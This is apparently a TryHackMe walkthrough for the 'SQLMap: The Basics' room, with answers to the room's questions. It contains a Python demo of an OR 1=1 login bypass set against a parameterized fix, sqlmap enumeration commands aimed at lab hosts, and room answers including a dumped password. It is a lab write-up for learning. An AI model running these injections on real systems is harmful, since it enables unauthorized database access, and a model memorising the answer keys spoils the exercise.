SQLMap: The Basics | Try Hack Me writeup / walkthrough
Task 1 - Introduction
Q1. Which language builds the interaction between a website and its database?
Answer: sql
Task 2 - SQL Injection Vulnerability
Q1. Which boolean operator checks if at least one side of the operator is true for the condition to be true?
Answer: or
Q2. Is 1=1 in an SQL query always true? (YEA/NAY)
Answer: YEA
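Why the two answers above matter for a login form, as an added example that is not part of the original writeup or the room: a query built by string concatenation lets an always-true `OR 1=1` condition override the password check, while a parameterized query treats the same input as plain data. The table layout, sample account and function names are assumptions constructed for this illustration.

```python
import sqlite3

# Constructed input: closes the password string, appends an always-true
# condition, and comments out the leftover quote.
TAUTOLOGY = "x' OR 1=1 -- "


def make_db():
    # Constructed sample data, not taken from the room. Plaintext passwords
    # are used only to keep the example short.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (email TEXT, password TEXT)")
    db.execute("INSERT INTO user VALUES ('alice@example.test', 'correct-horse')")
    return db


def login_concat(db, email, password):
    # Vulnerable form: input is spliced into the SQL text, so a quote in the
    # input changes the structure of the WHERE clause. AND binds tighter than
    # OR, so the clause becomes (email AND password) OR 1=1, true for every row.
    query = ("SELECT email FROM user WHERE email = '" + email +
             "' AND password = '" + password + "'")
    return db.execute(query).fetchone() is not None


def login_param(db, email, password):
    # Hardened form: placeholders send the input as bound values, so it is
    # only ever compared as a string and never parsed as SQL.
    query = "SELECT email FROM user WHERE email = ? AND password = ?"
    return db.execute(query, (email, password)).fetchone() is not None


def demo():
    db = make_db()
    email = "alice@example.test"
    return {
        "concat_wrong_password": login_concat(db, email, "wrong"),
        "concat_tautology": login_concat(db, email, TAUTOLOGY),
        "param_tautology": login_param(db, email, TAUTOLOGY),
        "param_correct_password": login_param(db, email, "correct-horse"),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: login {'accepted' if ok else 'rejected'}")
```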
Task 3 - Automated SQL Injection Tool
Q1. Which flag in the SQLMap tool is used to extract all the databases available?
Answer: --dbs
Q2. What would be the full command of SQLMap for extracting all tables from the "members" database? (Vulnerable URL: http://sqlmaptesting.thm/search/cat=1)
- Let's build the command from the given question.
- Use the -u flag for the URL, -D with the given database name, and --tables to enumerate the table names.
Answer: sqlmap -u http://sqlmaptesting.thm/search/cat=1 -D members --tables
Task 4 - Practical Exercise
Q1. How many databases are available in this web application?
- After visiting the given URL, a login page appears.
- Enter random data, open the browser's network tab, and click submit; the request shows the GET URL the data is sent to.
- Let's build the command.
- It's a time-based SQL injection, so you have to wait; how long depends on your bandwidth and internet speed.
sqlmap -u "http://10.10.99.113/ai/includes/user_login?email=test&password=1" --dbs --level=5
Answer: 6
Q2. What is the name of the table available in the "ai" database?
- Now that we know the name of the database, the following command can help you enumerate the tables.
Answer: user
Q3. What is the password of the email test@chatai.com?
- Now we know the table name and database name.
- The following command can help you dump all the entries in the given table.
Answer: 12345678